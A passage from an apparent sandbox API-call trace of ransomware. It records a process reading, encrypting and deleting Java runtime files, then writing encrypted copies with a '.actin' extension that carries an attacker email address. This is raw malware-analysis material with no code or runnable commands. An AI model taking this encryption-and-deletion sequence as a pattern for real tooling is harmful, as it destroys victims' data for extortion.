1 [0150.483] CryptEncrypt (in: hKey=0xac2d30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x3e50, dwBufLen=0x3e50 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x3e50) returned 1 [0150.483] WriteFile (in: hFile=0x308, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x3e50, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x3e50, lpOverlapped=0x0) returned 1 [0150.484] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac2e70) returned 1 [0150.484] CryptSetKeyParam (hKey=0xac2e70, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0150.484] CryptEncrypt (in: hKey=0xac2e70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0150.484] CryptDestroyKey (hKey=0xac2e70) returned 1 [0150.484] WriteFile (in: hFile=0x308, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0150.485] CryptDestroyKey (hKey=0xac2d30) returned 1 [0150.485] CloseHandle (hObject=0x2f8) returned 1 [0150.485] CloseHandle (hObject=0x308) returned 1 [0150.485] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java-rmi.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java-rmi.exe")) returned 1 [0150.486] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0150.486] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0150.486] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=159808) returned 1 [0150.486] CloseHandle (hObject=0x308) returned 1 [0150.486] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java.dll")) returned 0x20 [0150.486] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0150.486] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0150.487] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0150.487] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0150.487] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0150.487] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac2f30) returned 1 [0150.487] CryptSetKeyParam (hKey=0xac2f30, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0150.487] ReadFile (in: hFile=0x308, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x27040, lpOverlapped=0x0) returned 1 [0150.491] CryptEncrypt (in: hKey=0xac2f30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x27050, dwBufLen=0x27050 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x27050) returned 1 [0150.491] WriteFile (in: hFile=0x2f8, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x27050, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x27050, lpOverlapped=0x0) returned 1 [0150.494] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac32f0) returned 1 [0150.494] CryptSetKeyParam (hKey=0xac32f0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0150.494] CryptEncrypt (in: hKey=0xac32f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0150.494] CryptDestroyKey (hKey=0xac32f0) returned 1 [0150.494] WriteFile (in: hFile=0x2f8, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0150.494] CryptDestroyKey (hKey=0xac2f30) returned 1 [0150.494] CloseHandle (hObject=0x308) returned 1 [0150.494] CloseHandle (hObject=0x2f8) returned 1 [0150.494] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java.dll")) returned 1 [0150.496] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0150.496] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0150.496] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=206912) returned 1 [0150.496] CloseHandle (hObject=0x2f8) returned 1 [0150.497] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java.exe")) returned 0x20 [0150.497] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java.exe.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0150.497] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0150.497] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0150.497] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0150.497] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java.exe.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0150.497] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac2d30) returned 1 [0150.497] CryptSetKeyParam (hKey=0xac2d30, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0150.497] ReadFile (in: hFile=0x2f8, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x32840, lpOverlapped=0x0) returned 1 [0150.502] CryptEncrypt (in: hKey=0xac2d30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x32850, dwBufLen=0x32850 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x32850) returned 1 [0150.502] WriteFile (in: hFile=0x308, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x32850, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x32850, lpOverlapped=0x0) returned 1 [0150.713] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac2d70) returned 1 [0150.713] CryptSetKeyParam (hKey=0xac2d70, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0150.713] CryptEncrypt (in: hKey=0xac2d70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0150.713] CryptDestroyKey (hKey=0xac2d70) returned 1 [0150.713] WriteFile (in: hFile=0x308, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0150.713] CryptDestroyKey (hKey=0xac2d30) returned 1 [0150.713] CloseHandle (hObject=0x2f8) returned 1 [0150.713] CloseHandle (hObject=0x308) returned 1 [0151.074] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java.exe")) returned 1 [0151.083] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0151.083] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_iio.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javafx_iio.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0151.084] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=128064) returned 1 [0151.084] CloseHandle (hObject=0x2f0) returned 1 [0151.084] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_iio.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javafx_iio.dll")) returned 0x20 [0151.084] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_iio.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javafx_iio.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0151.084] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_iio.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javafx_iio.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0151.084] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0151.084] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0151.084] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_iio.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javafx_iio.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0151.084] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac3370) returned 1 [0151.084] CryptSetKeyParam (hKey=0xac3370, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0151.084] ReadFile (in: hFile=0x2f0, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x1f440, lpOverlapped=0x0) returned 1 [0151.088] CryptEncrypt (in: hKey=0xac3370, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x1f450, dwBufLen=0x1f450 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x1f450) returned 1 [0151.088] WriteFile (in: hFile=0x308, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x1f450, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x1f450, lpOverlapped=0x0) returned 1 [0151.090] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac33f0) returned 1 [0151.090] CryptSetKeyParam (hKey=0xac33f0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0151.090] CryptEncrypt (in: hKey=0xac33f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0151.090] CryptDestroyKey (hKey=0xac33f0) returned 1 [0151.090] WriteFile (in: hFile=0x308, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0151.091] CryptDestroyKey (hKey=0xac3370) returned 1 [0151.091] CloseHandle (hObject=0x2f0) returned 1 [0151.091] CloseHandle (hObject=0x308) returned 1 [0151.091] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_iio.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javafx_iio.dll")) returned 1 [0151.092] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0151.092] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaw.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javaw.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0151.093] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=206912) returned 1 [0151.093] CloseHandle (hObject=0x308) returned 1 [0151.093] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaw.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javaw.exe")) returned 0x20 [0151.093] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaw.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javaw.exe.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0151.093] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaw.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javaw.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0151.093] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0151.093] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0151.093] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaw.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javaw.exe.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0151.093] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac3170) returned 1 [0151.093] CryptSetKeyParam (hKey=0xac3170, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0151.093] ReadFile (in: hFile=0x308, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x32840, lpOverlapped=0x0) returned 1 [0151.098] CryptEncrypt (in: hKey=0xac3170, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x32850, dwBufLen=0x32850 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x32850) returned 1 [0151.098] WriteFile (in: hFile=0x2f0, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x32850, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x32850, lpOverlapped=0x0) returned 1 [0151.102] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac2eb0) returned 1 [0151.102] CryptSetKeyParam (hKey=0xac2eb0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0151.102] CryptEncrypt (in: hKey=0xac2eb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0151.102] CryptDestroyKey (hKey=0xac2eb0) returned 1 [0151.102] WriteFile (in: hFile=0x2f0, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0151.102] CryptDestroyKey (hKey=0xac3170) returned 1 [0151.102] CloseHandle (hObject=0x308) returned 1 [0151.102] CloseHandle (hObject=0x2f0) returned 1 [0151.102] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaw.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javaw.exe")) returned 1 [0151.104] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0151.104] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaws.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javaws.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0151.105] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=319552) returned 1 [0151.105] CloseHandle (hObject=0x2f0) returned 1 [0151.105] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaws.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javaws.exe")) returned 0x20 [0151.105] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaws.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javaws.exe.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0151.105] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaws.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javaws.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0151.105] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0151.105] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0151.105] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaws.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javaws.exe.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0151.106] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac3030) returned 1 [0151.106] CryptSetKeyParam (hKey=0xac3030, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0151.106] ReadFile (in: hFile=0x2f0, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x4e040, lpOverlapped=0x0) returned 1 [0151.112] CryptEncrypt (in: hKey=0xac3030, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x4e050, dwBufLen=0x4e050 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x4e050) returned 1 [0151.113] WriteFile (in: hFile=0x308, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x4e050, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x4e050, lpOverlapped=0x0) returned 1 [0151.118] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac3230) returned 1 [0151.118] CryptSetKeyParam (hKey=0xac3230, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0151.118] CryptEncrypt (in: hKey=0xac3230, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0151.118] CryptDestroyKey (hKey=0xac3230) returned 1 [0151.118] WriteFile (in: hFile=0x308, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0151.119] CryptDestroyKey (hKey=0xac3030) returned 1 [0151.119] CloseHandle (hObject=0x2f0) returned 1 [0151.119] CloseHandle (hObject=0x308) returned 1 [0151.119] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaws.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javaws.exe")) returned 1 [0151.122] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0151.122] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java_crw_demo.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java_crw_demo.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0151.122] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=29760) returned 1 [0151.122] CloseHandle (hObject=0x308) returned 1 [0151.122] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java_crw_demo.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java_crw_demo.dll")) returned 0x20 [0151.122] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java_crw_demo.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java_crw_demo.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0151.122] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java_crw_demo.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java_crw_demo.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0151.123] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0151.123] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0151.123] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java_crw_demo.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program 